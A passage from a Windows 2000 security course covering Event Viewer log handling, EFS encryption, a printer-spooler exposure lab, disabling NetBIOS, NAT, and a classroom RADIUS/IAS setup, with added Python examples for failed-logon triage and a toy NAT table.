To find any of these, you will use the View→Find command. With this command, you can search for events by using fields, including Event Source, Event ID, User, Computer, Success, Failure, Information, Warning, and Error.

In addition to the Find function, you can use the View→Filter command. The Filter Events function enables you to select specific criteria, apply the filter, and view only the events that are relevant to your filter. For example, if you are still under the impression that an account is being attacked, you can select that account as the filter, and view all instances of that account in the Security Log.

When you apply a filter, the full log data is not altered, only the presentation of the data on screen. You have the same options for filtering as were available to you when searching. In addition to the fields that are available with the Find command, you will also have the option to define events from and to a specific date and time.

Finally, a very direct feature in the Event Viewer is the sorting option. Just as in other Windows applications, you can sort by any of the columns in the Event Viewer to group events, such as by time or by Event ID. By default, the Event Viewer displays events with the most recent event on the top of the list.

If you will need to store the logs for later reading or analysis, there is also an option to save the log. You can save the log as either an Event Log file (*.evt), a text file (*.txt), or a CSV (Comma Separated Value or Comma Delimited) file (*.csv). You can then open these files later in Event Viewer or in a database or other reading application.
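As an added example (not part of this course, and not an Element K or Microsoft tool), the following Python script reads a constructed CSV export in the shape of an Event Viewer save, decodes Event IDs, Logon Types and Event 681 Error Codes using the tables from the Authentication Logging section, and flags the run of 529 events for a single account that the Event IDs and Managing Log Files sections describe as a possible attack. The column names and the sample rows are assumptions; a real export has more columns.

```python
"""Triage a Windows 2000 Security log saved from Event Viewer as CSV.
Added example for this course text, not an Element K or Microsoft tool;
the column layout and sample rows are constructed for illustration."""
import csv
import io
from collections import defaultdict
from datetime import datetime, timedelta

# A subset of the logon-related Event IDs from the course tables.
EVENT_DESCRIPTIONS = {
    528: "Successful logon",
    529: "Failed logon: unknown user name or bad password",
    538: "Successful logoff",
    539: "Failed logon: account locked out",
    540: "Successful network logon",
    644: "User account locked out",
    681: "Account logon failed (see ErrorCode)",
}
LOGON_TYPES = {2: "Interactive", 3: "Network", 4: "Batch", 5: "Service",
               6: "Proxy", 7: "Unlock Workstation"}
# Event 681 Error Codes from the course table. They are NTSTATUS values
# printed in decimal, e.g. 3221225578 is 0xC000006A (wrong password).
ERROR_CODES = {
    3221225572: "user name does not exist",
    3221225578: "password incorrect",
    3221226036: "account locked out",
    3221225586: "account disabled",
    3221225583: "logon outside allowed hours",
    3221225584: "logon from a workstation the account may not use",
    3221225875: "account expired",
    3221225585: "password expired",
    3221226020: "user must change password at next logon",
}
# Constructed export: five bad-password attempts one minute apart, the
# resulting lockout, then another user unlocking a workstation.
SAMPLE_CSV = """\
Date,Time,Type,EventID,User,Computer,LogonType,ErrorCode
11/21/2002,19:30:00,Failure Audit,529,Ordinary,INS-W2K-01,2,
11/21/2002,19:31:00,Failure Audit,529,Ordinary,INS-W2K-01,2,
11/21/2002,19:32:00,Failure Audit,529,Ordinary,INS-W2K-01,2,
11/21/2002,19:33:00,Failure Audit,529,Ordinary,INS-W2K-01,2,
11/21/2002,19:34:00,Failure Audit,529,Ordinary,INS-W2K-01,2,
11/21/2002,19:35:00,Success Audit,644,Ordinary,INS-W2K-01,,
11/21/2002,19:36:00,Failure Audit,681,Ordinary,INS-W2K-01,,3221226036
11/21/2002,19:40:00,Success Audit,528,StudentP,INS-W2K-01,7,
11/21/2002,19:41:00,Failure Audit,529,StudentP,INS-W2K-01,2,
"""

def parse_export(text):
    """Turn the CSV text into a list of event dicts with typed fields."""
    events = []
    for row in csv.DictReader(io.StringIO(text)):
        when = datetime.strptime(f"{row['Date']} {row['Time']}",
                                 "%m/%d/%Y %H:%M:%S")
        events.append({
            "when": when,
            "type": row["Type"],
            "event_id": int(row["EventID"]),
            "user": row["User"],
            "computer": row["Computer"],
            "logon_type": int(row["LogonType"]) if row["LogonType"] else None,
            "error_code": int(row["ErrorCode"]) if row["ErrorCode"] else None,
        })
    return events

def describe(ev):
    """One readable line: Event ID meaning, Logon Type, decoded Error Code."""
    text = EVENT_DESCRIPTIONS.get(ev["event_id"], f"Event ID {ev['event_id']}")
    if ev["logon_type"] is not None:
        text += f" ({LOGON_TYPES.get(ev['logon_type'], 'unknown logon type')})"
    if ev["error_code"] is not None:
        reason = ERROR_CODES.get(ev["error_code"], "unknown error code")
        text += f"; reason: {reason} (0x{ev['error_code']:08X})"
    return text

def find_failed_logon_bursts(events, threshold=5, window=timedelta(minutes=10)):
    """Accounts with at least `threshold` 529 events inside one `window`.
    A sliding window over each account's sorted timestamps finds the
    densest run, the pattern the course flags as a possible attack."""
    by_account = defaultdict(list)
    for ev in events:
        if ev["event_id"] == 529:
            by_account[(ev["user"], ev["computer"])].append(ev["when"])
    bursts = []
    for (user, computer), times in by_account.items():
        times.sort()
        best, start = 0, 0
        for end in range(len(times)):
            while times[end] - times[start] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            bursts.append({"user": user, "computer": computer, "count": best})
    return bursts

if __name__ == "__main__":
    evs = parse_export(SAMPLE_CSV)
    for ev in evs:
        print(ev["when"], ev["type"], ev["user"], describe(ev))
    print("Possible password guessing:", find_failed_logon_bursts(evs))
```

The same sliding-window check applies to any failure Event ID; change the literal 529 to 539 to watch for repeated attempts against an account that is already locked out.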


Third-party Applications

As functional as the built-in features of the Event Viewer are, for many people they do not provide enough control or options. To address that need, there are several third-party applications that work for managing the Event Logs.

One of these programs is the Event Log Sentry, by Engagent, whose Web site is www.engagent.com. This tool enables you to manage the logs of several computers from a single location. By using this tool, you can monitor events in real-time and have the software contact you or trigger an automated response to the events. This tool crosses the line from simply viewing the Event Logs into the realm of Intrusion Detection Systems (IDS). IDS is beyond the scope of this course and will be fully covered along with the Event Log Sentry tool in the Network Defense and Countermeasures course.

Topic 4F
Windows 2000 EFS

One of the significant benefits to using personal computers is that you have the ability to boot into multiple operating systems for whatever use you feel is appropriate. Although this presents great convenience and benefit to the users of computers, it presents great difficulty in the world of security, especially in the corporate environment.

In addition to the security risks of multiple operating systems, there are complex security risks introduced with the use of laptop computers. Laptops often get stolen or misplaced, and the data on the laptop computer is vulnerable to compromise as soon as the location of the computer is unknown (unknown to the owner, that is).

By using NTFS security, you are able to combat the issues of security to a certain extent. As demonstrated, there are tools available to access even properly secured data on an NTFS partition.

To solve this issue, we now introduce the concept of data encryption. Not a new idea, data encryption works to make the files on the computer useful only to the proper owner of the data. Some of these systems would work by providing a password for each encrypted file, which—while effective—is not practical for large volumes of files.

Another method of using encryption is to use a key to unlock each file that has been encrypted, with only one user holding the key. This is the approach that Microsoft's Encrypting File System (EFS) takes to data encryption.

EFS uses what is known as public key cryptography, the details of which are beyond the scope of this course. In general, however, public key cryptography is the use of two keys: one that performs encryption and another that performs decryption. The keys are linked by a mathematical formula. Each file that is encrypted by EFS has a unique key pair protecting its contents, using the DES encryption algorithm.

intrusion detection: Pertaining to techniques which attempt to detect intrusion into a computer or network by observation of actions, security logs, or audit data. Detection of break-ins or attempts either manually or via software expert systems that operate on logs or other information available.


EFS supports file encryption both on a local hard drive and on a remote file server. However, it is very important to note that any files that are encrypted on the remote server will be transmitted over the network in cleartext by default. This is because the file is decrypted at the file server and then sent to the user. In order to maintain a high level of security, there must be a mechanism in place to secure the network traffic, such as IPSec, which you worked with earlier in the course.

The implementation of EFS works directly with NTFS. Data can be encrypted only on NTFS partitions. EFS is designed to encrypt any temporary files created along with the originals, and the keys are stored in the kernel using nonpaged memory, so they are never vulnerable to an attacker searching the pagefile of the system.

EFS and Users

One of the things that can be a good—or bad—issue of EFS is that users can use it with no administrative effort. The EFS subsystem automatically creates the required keys, if the user does not already have a public key pair to use.

Files and folders that are marked for encryption are encrypted on a per-file or per-folder basis, each with a unique encryption key. Because they are encrypted uniquely, if you move an encrypted file to an unencrypted folder on the same partition, the file will remain encrypted. If you copy an encrypted file to a location that allows for encryption, the file will remain encrypted.

The use of EFS is designed to be transparent to the user. This means that a user may have encryption enabled and not be aware of it. As long as things go smoothly, this is not an issue. In the event things do not go smoothly, there are methods for recovery.

Data Recovery

Obviously, if EFS can be implemented by a user, and is designed to be transparent, it can be used where it was not intended. EFS allows for what are known as Recovery Agents. The default Recovery Agent is the Administrator. These agents have configured public keys that are used to enable file recovery. The system is designed so that only the file recovery is possible; the Recovery Agent cannot learn about the user's private key.

Using Data Recovery is designed for those companies and organizations who have the requirement of accessing data if an employee leaves or if the encryption key is lost. The policy for how Data Recovery will be implemented is defined at a Domain Controller and will be enforced on every computer in that domain. If EFS is implemented on a machine that is not part of a domain, the system will automatically generate and save Recovery Keys.

EFS Cryptography

As mentioned, EFS uses public key cryptography, based on the DES encryption algorithm. This is the default; with Service Pack 1 and the High-encryption pack or with Service Pack 2 or greater, 3DES is used. Data is encrypted by what is called a File Encryption Key (FEK). This FEK is a randomly generated key, as required by the algorithm.

The FEK itself is then encrypted by using a public key, which creates a list of encrypted FEKs. The list is then stored with the encrypted file in a special attribute called the Data Decryption Field (DDF). When a user needs to decrypt the file, he or she will use the private key that was part of the key pair.


You can perform encryption from the command line or from within Explorer. When you are using Explorer, the option to encrypt is on the Advanced tab of the general Properties window. When you are using the command line, the command is cipher, with an /e switch for encryption and a /d switch for decryption.

TASK 4F-1
Encrypting Files

Setup: You are logged on to Windows 2000 as the renamed Administrator account.

1. At the root of the NTFS partition, create a text document called Mine.txt, and place some text in it.

2. Open Explorer, and display the properties of the Mine.txt file.

3. Click Advanced, check Encrypt Contents To Secure Data, and click OK twice.

4. Observe the Explorer window to verify that the E attribute is now set.

5. Close all open windows.

Topic 4G
Windows 2000 Network Security

In this topic, you will examine the effects of turning on/off the NetBIOS protocol on a Windows 2000 machine. NetBIOS stands for Network Basic Input Output System, and is an API that allows for addressing of devices on a network, regardless of the underlying protocol such as IP or IPX. NetBIOS itself relies on SMB.

About the Tasks

For the following tasks, students should work in pairs. The tasks refer to the machines as Student_P and Student_Q. These pairs of machines will participate in a file- and printer-sharing exercise, where all the computers designated as Student_P are Windows clients and the computers designated as Student_Q are file and print servers.

Also, while on the subject of print shares, you will address the issue of spooler file insecurity that was discussed earlier. You will take a look at the contents of a spooled file. You will also capture information being sent to a network printer. You will view the contents of this capture. What you will realize pretty soon is that information that is classified should be sent only to print servers that are classified. The printers should also be physically secure. Folders that hold spooled files should be secure. It goes without saying, then, that network traffic should be secure.

Securing Network Communications


TASK 4G-1
Investigating Printer Spooler Security

Setup: You are logged on to Windows 2000 as the renamed Administrator account. If you have been designated as Student_P, you will act as a Windows client; if you have been designated as Student_Q, you will act as a Windows file and print server.

Note: Perform step 1 through step 18 only if you are designated as Student_Q.

1. In your boot partition, create a folder named Share.

2. Right-click this folder, and choose Sharing.

3. Click Share This Folder, leave the default share name as Share, and click OK.

4. From the Start menu, choose Settings→Printers.

5. Double-click Add Printer.

6. Click Next.

7. Verify that Local Printer is selected. Uncheck Automatically Detect And Install My Plug And Play Printer. Click Next.

8. Verify that Use The Following Port is selected, leave it at the default port (LPT1:), and click Next.

9. Select any printer from the list, and click Next.

10. Shorten the printer name to the first four letters, and click Next.

11. Allow the printer to be shared, leave the share name as whatever is displayed, and click Next twice.

12. When you are prompted to print a test page, click No, and then click Next and click Finish.

13. Select the printer, and choose File→Server Properties.

14. Click the Advanced tab, and note the default location of the spool folder. It should be \WINNT\System32\Spool\PRINTERS.

15. Click OK.

16. Right-click the printer and choose Properties.

17. Click the Advanced tab, and verify that the printer is always available, and that documents will be spooled to speed up printing.

18. Check Keep Printed Documents, and click OK.


Note: Perform step 19 through step 26 only if you are designated as Student_P.

19. Double-click My Network Places.

20. Double-click Computers Near Me.

21. Double-click the print server.

22. Right-click the printer name (next to the shared printer icon), and choose Connect.

23. Start Notepad.

24. Enter the text This is a classified document.

25. Save the file to your Desktop with the filename TOP_SECRET.txt.

26. Choose File→Print, select the printer you just connected to, and click Print. Your file should be sent to the print server.

Note: Perform step 27 through step 35 only if you are designated as the print server (Student_Q).

27. Observe the screen. Now, although there is no physical printer (or print device in Microsoft terminology) attached to your machine, the print server will try to send this job off through LPT1, and a short while later will report an error in the form of a pop-up message.

28. When the error message is displayed, click Cancel.

29. Navigate to the \WINNT\System32\Spool\PRINTERS folder.

30. Observe the contents of the Printers folder. The files sent for printing are sitting there. They have job numbers followed by .SHD and .SPL file extensions. The SPL files are the actual spooled files and the SHD files are the spool header files.

The SPL file is the one that interests us.

31. Double-click the SPL file.

32. When the Open With dialog box is displayed, uncheck Always Use This Program To Open These Files, and then select Notepad from the list.

33. Scroll down to the bottom of the file. Towards the end of the file, after all the printer language is taken care of, you will see the name of the file and its contents.

34. Double-click the SHD file.

35. Uncheck Always Use This Program To Open These Files, and then select Notepad from the list. You will see who sent this file and from which computer.

How dangerous could this information be if it was really classified and someone with malicious intent configured the print server to Keep Printed Documents?

36. Close both instances of Notepad.

Communicating without NetBIOS

Several networks will stipulate the disabling of NetBIOS on the network, as it provides much information to potential attackers. In the following task, you will examine the network performance when the server is configured not to communicate using NetBIOS.

TASK 4G-2
Communication without NetBIOS

Note: Perform step 1 through step 4 only if you are designated as the client (Student_P).

1. From the Start menu, choose Settings→Printers.

2. Right-click the printer, choose Delete, and then click Yes.

3. If necessary, click OK to close the Printers information box.

4. From the Start menu, choose Run, and enter \\NetBIOS_Name_of_SERVER to display an Explorer window that shows you a list of shares on the server.

Note: Perform step 5 through step 7 only if you are designated as the print server (Student_Q).

5. Open a command prompt, and enter nbtstat -S to display NetBIOS connections.

6. Observe the NetBIOS connections listed for the interface that the two computers are using for the communications.

7. Leave the command prompt open.

Note: Perform the following step only if you are designated as the client.

8. Close all open windows.

Note: Perform step 9 through step 20 only if you are designated as the server.

9. Re-enter the command nbtstat -S to refresh the display of NetBIOS connections.


10. Observe that there is one less NetBIOS connection. If the connection is still displayed, wait a few minutes and try again.

11. Now, right-click My Network Places, and choose Properties.

12. Double-click the Classroom Hub interface, and click Properties.

13. Select Internet Protocol, and then click Properties.

14. Click Advanced, and then click the WINS tab.

15. Select Disable NetBIOS Over TCP/IP.

16. Click OK, and then click Yes to acknowledge the pop-up message.

17. Click OK twice, and then click Close.

18. Repeat the last six steps to disable NetBIOS on each network interface in your computer.

19. In the command prompt, re-enter the command nbtstat -S to refresh the display.

20. Observe that there are no NetBIOS connections now.

Note: Perform step 21 through step 23 only if you are designated as the client.

21. In the Run dialog box, re-enter \\NetBIOS_Name_of_SERVER to try and get a list of shares on the server. You should see an error message. Click OK.

22. In the Run dialog box, enter \\IP_address_of_SERVER to try to get that list of shares. If necessary, use your partner's remote credentials to log on. You should now see an Explorer window open showing you a list of shares on the server.

23. Close all open windows.

Note: Perform the rest of this task only if you are designated as the server.

24. Re-enter the command nbtstat -S to refresh the display.

25. Observe that, even though the client is connected, there are no NetBIOS connections. Your connection is based on pure IP.

From this, we can gather that the NetBIOS protocol is really not necessary for a Windows 2000 network—although, for backward compatibility, Microsoft will not let you install a Windows 2000 machine without a NetBIOS computer name.

If (host) name resolution is required, it can be achieved via the Internet standard DNS.

26. Close all open windows.

If students cannot access the list of shares, have them check to make sure that the remote account has not been locked out.


NAT and ICSUp to this point, all of the security systems and methods you have been using aregeared towards securing the operating system and data on the physical hard drive.All of the security systems that you create are of little use if an attacker is able tosimply sniff all the packets off the network and recompile them at his or herleisure.

Network Address Translation (NAT) is an Internet standard defined in RFC 1631 (since superseded by RFC 3022). NAT masks internal IP addresses behind the IP address of the external Internet connection. Although NAT was not designed as a security mechanism, many security policies require it, because a host behind NAT is not directly reachable from the Internet unless a translation entry for it exists; this adds a layer between the Internet and the intranet.

NAT functions by taking a request from an internal client and making that request to the Internet on behalf of the internal client. With this configuration, clients on the internal network are not required to have a public IP address, which conserves public IP addresses. The internal clients can be configured with addresses from the private network blocks. Remember, private IP addresses are ones that are not routed on the Internet. They are defined by RFC 1918, and the address ranges are:

• 10.0.0.0 through 10.255.255.255

• 172.16.0.0 through 172.31.255.255

• 192.168.0.0 through 192.168.255.255

It is also worth noting that Windows uses one more range, 169.254.0.0 through 169.254.255.255, for Automatic Private IP Addressing (APIPA): a host that is configured for DHCP but cannot reach a DHCP server assigns itself an address from this block. This range is not part of RFC 1918 (it is the IPv4 link-local block, now defined in RFC 3927); it is never routed, and a client that turns up with a 169.254.x.x address is a sign of a DHCP failure rather than a deliberately assigned private address.

NAT is an integrated part of Routing and Remote Access Services (RRAS), which will be addressed shortly, as well as part of Internet Connection Sharing (ICS). The version of NAT that is used by ICS is scaled down from the full version and does not allow for the level of configuration that the RRAS NAT allows.

ICS is designed for a small office or for a home network, where one Internet connection is to be shared by the entire network. All users connect via a single interface, usually a modem, DSL, or cable access point.
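The translation described above, as an added example that is not part of the course text: a toy source-NAT (port-address translation) table with a single public address on the outside interface. It translates outbound packets only for sources in the RFC 1918 blocks, maps replies back through the table, and drops unsolicited inbound packets that match no entry, which is the "extra layer" the text refers to. The addresses, ports and packets are constructed for the demonstration, and the sequential port allocation is a simplification of what real NAT devices do.

```python
"""Toy source-NAT table: added example, not course code. Assumes one public
address on the outside interface and allocates public ports sequentially.
Addresses and packets below are constructed for the demonstration."""
import ipaddress
from dataclasses import dataclass

# RFC 1918 private blocks, plus the 169.254/16 link-local (APIPA) block Windows self-assigns.
PRIVATE_BLOCKS = [ipaddress.ip_network(n) for n in
                  ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
LINK_LOCAL = ipaddress.ip_network("169.254.0.0/16")


def classify(addr):
    """Return 'private', 'link-local' or 'public' for an IPv4 address string."""
    ip = ipaddress.ip_address(addr)
    if any(ip in net for net in PRIVATE_BLOCKS):
        return "private"
    if ip in LINK_LOCAL:
        return "link-local"
    return "public"


@dataclass(frozen=True)
class Packet:
    src: str
    sport: int
    dst: str
    dport: int


class Nat:
    def __init__(self, public_ip, first_port=1024):
        self.public_ip = public_ip
        self.next_port = first_port
        self.out_map = {}   # (src, sport, dst, dport) -> public port
        self.in_map = {}    # (public port, remote ip, remote port) -> (src, sport)

    def outbound(self, pkt):
        """Rewrite an internal client's packet so it leaves with the public address."""
        if classify(pkt.src) != "private":
            raise ValueError("only private (RFC 1918) sources are translated")
        key = (pkt.src, pkt.sport, pkt.dst, pkt.dport)
        port = self.out_map.get(key)
        if port is None:                      # first packet of this flow: create state
            port = self.next_port
            self.next_port += 1
            self.out_map[key] = port
            self.in_map[(port, pkt.dst, pkt.dport)] = (pkt.src, pkt.sport)
        return Packet(self.public_ip, port, pkt.dst, pkt.dport)

    def inbound(self, pkt):
        """Reverse-translate a reply. None means no matching state: the packet is dropped."""
        if pkt.dst != self.public_ip:
            return None
        entry = self.in_map.get((pkt.dport, pkt.src, pkt.sport))
        if entry is None:
            return None
        src, sport = entry
        return Packet(pkt.src, pkt.sport, src, sport)


def demo():
    """One client flow out, its reply back in, and an unsolicited probe that is dropped."""
    nat = Nat("203.0.113.5")
    inside = Packet("192.168.1.10", 40000, "198.51.100.80", 80)
    out = nat.outbound(inside)
    reply = Packet("198.51.100.80", 80, "203.0.113.5", out.sport)
    back = nat.inbound(reply)
    unsolicited = Packet("198.51.100.9", 5555, "203.0.113.5", 3389)
    return out, back, nat.inbound(unsolicited)
```

The table keyed on the full four-tuple is what lets a single public address multiplex many internal clients; it is also why an attacker on the Internet cannot reach 192.168.1.10 on port 3389 directly, but can still reach it through any connection the client opened itself.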

Remote Access

The Windows 2000 Routing and Remote Access Service (RRAS) is made up of several components, including:

• Network Address Translation (NAT)

• Routing protocols (RIP and OSPF)

• Remote Authentication Dial-In User Service (RADIUS) client support

The Remote Access Server component of RRAS accepts PPP connections and can be set up to require authentication. For authentication, RRAS can use either Windows Authentication or RADIUS. If RRAS is using RADIUS, the dial-in credentials a user presents to the RRAS server are forwarded to the RADIUS server; the RRAS server is acting as a RADIUS client. The RADIUS server then authenticates the user, decides whether that user is authorized to access the network, and returns the verdict to the RRAS server.


When RRAS is configured for RADIUS authentication, the Remote Access Policy is evaluated by the Internet Authentication Service (IAS), which is the Microsoft implementation of RADIUS, rather than by the RRAS server itself. IAS performs authentication, authorization, auditing, and accounting for users who connect to the network via dial-up and VPN connections. For authentication, IAS allows great flexibility, accepting PAP, CHAP, MS-CHAP, and EAP. EAP, the Extensible Authentication Protocol, is used in conjunction with technologies such as smart cards, token cards, and one-time passwords. Note that PAP carries the password in the clear over the PPP link, and between the RRAS server and IAS it is hidden only by the RADIUS shared secret, so prefer MS-CHAP or EAP wherever the clients support them.

RADIUS Implementation in the Classroom

The following section contains several long tasks, involving the implementation of the RADIUS server and the RADIUS client. For these tasks, students should work in pairs (Student_P and Student_Q). These pairs of machines will participate in a RAS exercise where all of the computers designated as Student_P are configured as the Remote Access Client (or Dialup Client) and dial out to their corresponding Dialup Server, which are the computers designated as Student_Q. These Dialup Servers will also be configured as RADIUS Clients. These RADIUS Clients will pass on authentication requests to the Instructor Machine, which will be configured as the RADIUS Server. Thus, the Instructor Machine will function as the RADIUS Server for the whole class and is an integral part of the task.

For the rest of the tasks associated with implementing RADIUS, these machines will be referred to as follows:

• Student_P: Windows 2000 Server as a Dialup Client.

• Student_Q: Windows 2000 Server as a RADIUS Client.

• Instructor_Machine: Windows 2000 Server as a RADIUS Server.

TASK 4G-3 Physically Preparing for RADIUS Implementation

Objective: To take care of some physical connectivity issues prior to implementing RADIUS in the classroom.

1. Verify that the null modem cable between the Dialup Client and the RADIUS Client is firmly in place.

2. On the Dialup Client, disable both Ethernet adapters.

3. If necessary, on the RADIUS Client, disable the Ethernet adapter connected to the Dialup Client, but leave the Ethernet adapter connected to the classroom hub enabled. See the class configuration diagram that follows for guidance.

4. On the RADIUS Server, do nothing. All of the RADIUS Clients will contact this server via the existing network.


You should have a class configuration that looks like the following graphic.

Configuring the Dialup Server

In the next task, you will configure the Dialup Server component of the RADIUS Client. You will configure this server to allocate IP addresses to Dialup Clients for the dialup interfaces. For the task, if the RADIUS Client is on the left side of the classroom and is seat number 3, then the range you should use is 192.168.163.101 to 192.168.163.110. If the RADIUS Client is on the right side of the classroom and is seat number 8, then the range you should use is 192.168.188.101 to 192.168.188.110. Your instructor will clarify addressing requirements if you have any doubts at this point.

TASK 4G-4 Configuring the Dialup Server

Note: Perform this task only if you are designated as a RADIUS Client.

1. From the Start menu, choose Settings→Network And Dial-up Connections.

2. Verify that the Ethernet connection connected to your neighbor’s computer is disabled.


3. Open a command prompt, and use the ipconfig /all command to verify that you have just one IP address. This should be in either the 172.16.x.x or 172.18.x.x network. Close the command prompt.

4. Double-click Make New Connection, provide the local area code (if prompted), and then click Next.

5. Click Connect Directly To Another Computer, and click Next. Select Host, and click Next. Select the device (Communications Port [COM1]), and click Next.

In the next box, you are supposed to select those users who can dial in; however, this RAS server will eventually be configured as a RADIUS client. So for now, we will configure a user only for the purposes of testing the modem connection.

6. Click Add. For the User Name, enter radtest.

7. For Password, enter aA123456, confirm it, and click OK.

8. Click Next.

9. Read the name for your connection, and click Finish. It might take a while for the Wizard to close, so be patient.

10. Right-click Incoming Connections, and choose Properties.

11. Click the Networking tab, select Internet Protocol (TCP/IP), and click Properties.

12. Under TCP/IP Address Assignment, click Specify TCP/IP Addresses.

If you are on the left side of the classroom, enter the range 192.168.16x.101 to 192.168.16x.110, where x is your seat number.

If you are on the right side of the classroom, enter the range 192.168.18x.101 to 192.168.18x.110, where x is your seat number.

13. Click OK twice.

14. Open Control Panel.

15. Double-click Phone And Modem Options.

16. Click the Modems tab.

17. If necessary, select Communications Cable Between Two Computers, and click Properties.

18. Under Maximum Port Speed, select 115200 from the drop-down list.

19. Click OK twice, and then close all open windows.


Configuring the Dialup Client

Once the Dialup Server has been configured, a significant portion of the initial configuration has been completed. The next part of the process will be to configure the clients for dial-up usage. The setup of the two computers remains the same for this portion of the RADIUS implementation tasks.

TASK 4G-5 Configuring the Dialup Client

Note: Perform step 1 through step 20 only if you are designated as a Dialup Client.

1. From the Start menu, choose Settings→Network And Dial-up Connections.

2. Verify that your Ethernet connections are disabled.

3. Open a command prompt, and use the ipconfig /all command to verify that you have no IP addresses. Close the command prompt.

4. Double-click Make New Connection, provide the local area code (if prompted), and click Next.

5. Click Connect Directly To Another Computer, and click Next. Select Guest, and click Next. Select the device (Communications Port [COM1]), and click Next twice.

6. Provide a name for your direct connection, such as DUN_01, and click Finish. It might take a while for the wizard to close, so be patient.

7. When you are prompted to make a connection, click Cancel.

8. Open Control Panel.

9. Double-click Phone And Modem Options.

10. Click the Modems tab.

11. Select Communications Cable Between Two Computers, and click Properties.

12. Under Maximum Port Speed, select 115200 from the drop-down list.

13. Click OK twice.

14. Right-click your direct connection, choose Properties, and then click Configure.

15. For Maximum Speed (bps), select 115200 from the drop-down list.

16. Click OK twice.

17. Double-click your direct connection.


18. For the User Name and Password, enter radtest and aA123456, respectively, and click Connect. You should be connected to the dialup server in a few seconds.

19. Click OK to close the Connection Complete information box.

20. Verify your IP address by using the ipconfig /all command in a command prompt. You should have a 192.168.16x.y or 192.168.18x.y address assigned to the dialup interface. Close the command prompt.

Note: Perform the next step only if you are designated as a RADIUS Client.

21. Verify your IP address(es) by using the ipconfig /all command in a command prompt. You should now have a 192.168.16x.y or 192.168.18x.y address assigned to the dialup interface. Close the command prompt.

Note: Perform the next step only if you are designated as a Dialup Client.

22. In the Network And Dial-up Connections Control Panel, right-click your direct connection, and choose Disconnect.

Creating Users on the RADIUS Server

Now that the Dialup Server and Dialup Client configurations have been completed, it is time to move on to the RADIUS Server. Because not every machine in the classroom can be the server, your instructor will configure the Instructor Machine to be the RADIUS Server. Pay close attention to the steps being taken. First, a database of users will be created (this is the kind of task that an ISP would perform to keep its user database centrally located).

INSTRUCTOR TASK 4G-6 Creating Users on the RADIUS Server

Setup: Your instructor will perform this task at the Instructor Machine.

1. If necessary, log on to Windows 2000 Server as Administrator.

2. Right-click My Computer, and choose Manage.

3. In the left pane, expand Local Users And Groups and right-click the Users folder. Choose New User.

4. For User Name, enter RaduserL1.

5. For Password, enter aA123456, and confirm it.

6. Uncheck User Must Change Password At Next Logon.

7. Check User Cannot Change Password and Password Never Expires.

8. Click Create.


9. Repeat the last five steps to create users named RaduserL3, RaduserL5, RaduserL7, RaduserR1, RaduserR3, RaduserR5, and RaduserR7.

10. Click Close.

11. Click the Users folder.

12. Verify the names of the users you just created.

13. Inform each student pair (Dialup Client and RADIUS Client) which Raduser account they will use later when testing RADIUS authentication. For example, the second pair on the right side of the classroom should use RaduserR3.

14. Leave the Computer Management MMC open.

IAS

User accounts have been created for the remote access connections. Next, IAS will be installed on the Instructor Machine to make it a RADIUS Server. Following that, the RADIUS Clients that are allowed to communicate with the RADIUS Server will be specified on the RADIUS Server. A policy will also be configured on the RADIUS Server to allow users who meet the authentication requirements to be granted access.

INSTRUCTOR TASK 4G-7 Installing IAS

Setup: Your instructor will perform this task at the Instructor Machine.

1. Right-click My Network Places, and choose Properties.

2. Choose Advanced→Optional Networking Components. Do not check or uncheck any boxes.

3. Select Networking Services, and click Details.

4. Check Internet Authentication Service, and click OK. IAS is Microsoft’s implementation of RADIUS. Click Next.

5. From the Start menu, choose Programs→Administrative Tools→InternetAuthentication Service.

6. In the left pane, right-click Clients, and choose New Client. You will be prompted to enter a friendly name.

7. For Friendly Name, enter RADCLIENT_L01 and click Next.

8. Enter the IP address of the RADIUS Client belonging to the first student pair on the left side of the class.

9. For Shared Secret and Confirm Shared Secret, enter secret. A one-word secret is acceptable only in this closed classroom; in production, use a long random secret that is unique to each RADIUS client, because anyone who learns it can decode the User-Password attributes it protects and forge accept responses.


10. Click Finish.

11. Repeat the last five steps to account for all RADIUS Clients in the class, on both the left and right sides.

12. In the left pane, click Remote Access Policies.

13. In the right pane, double-click the policy.

14. Under If A User Matches The Conditions, select Grant Remote Access Permission.

15. Click OK, and close all open windows.

RIP

To allow Dialup Clients to eventually communicate, the Dialup Servers need to know the various networks that will be coming up and create routes for them. So, you will install RIP, because that is all that is required in this classroom. A more complicated network will need more sophisticated dynamic routing protocols. Bear in mind that RIP accepts route advertisements from any neighbor on the segment unless you configure RIPv2 authentication and neighbor filtering, so on a production network a rogue host can inject routes; the classroom hub is a closed environment.

TASK 4G-8 Installing RIP

Setup: This task requires the instructor and students to perform steps.

Note: Perform step 1 through step 6 only if you are the instructor.

1. From the Start menu, choose Programs→Administrative Tools→Routing And Remote Access.

2. In the left pane, right-click your computer name, and choose Configure And Enable Routing And Remote Access.

3. Click Next, select Manually Configured Server, click Next, and then click Finish. When you are prompted to start the service, click Yes.

4. In the left pane, expand the computer name, and then expand IP Routing.

5. Right-click General, choose New Routing Protocol, and select RIP or RIPv2 (whichever is listed). Click OK.

6. Right-click RIP, choose New Interface, select your network interface, and click OK twice. Close the RRAS console.

Note: Perform step 7 through step 12 only if you are designated as a RADIUS Client.

7. From the Start menu, choose Programs→Administrative Tools→Routing And Remote Access.


8. In the left pane, right-click your computer name, and choose Configure And Enable Routing And Remote Access.

9. Click Next, select Manually Configured Server, click Next, and then click Finish. When you are prompted to start the service, click Yes.

10. In the left pane, expand the computer name, and then expand IP Routing.

11. Right-click General, choose New Routing Protocol, and select RIP. Click OK.

12. Right-click RIP, choose New Interface, select your network interface, and click OK twice.

Configuring the Dialup Server as a RADIUS Client

In this next task, you will configure your Dialup Server to behave as a RADIUS Client. Unlike the RADIUS Server, no extra software needs to be added to your server. It’s just a matter of configuring your Dialup Server for pass-through authentication.

TASK 4G-9 Configuring the Dialup Server as a RADIUS Client

Note: Perform this task only if you are designated as a RADIUS Client.

1. In the left pane, right-click your computer name, and choose Properties.

2. Click the Security tab.

3. Under Authentication Provider, select RADIUS Authentication from the drop-down list.

4. Click the Configure button found to the right of the drop-down list.

5. Under The Following RADIUS Servers Are Queried In Order From The Highest To The Lowest Score, click Add.

6. Specify the IP address of the RADIUS Server. This is your instructor machine’s IP address, which should be 172.17.10.1.

7. For Secret, click the Change button, and enter the same secret your instructor entered on the RADIUS Server (the word secret).

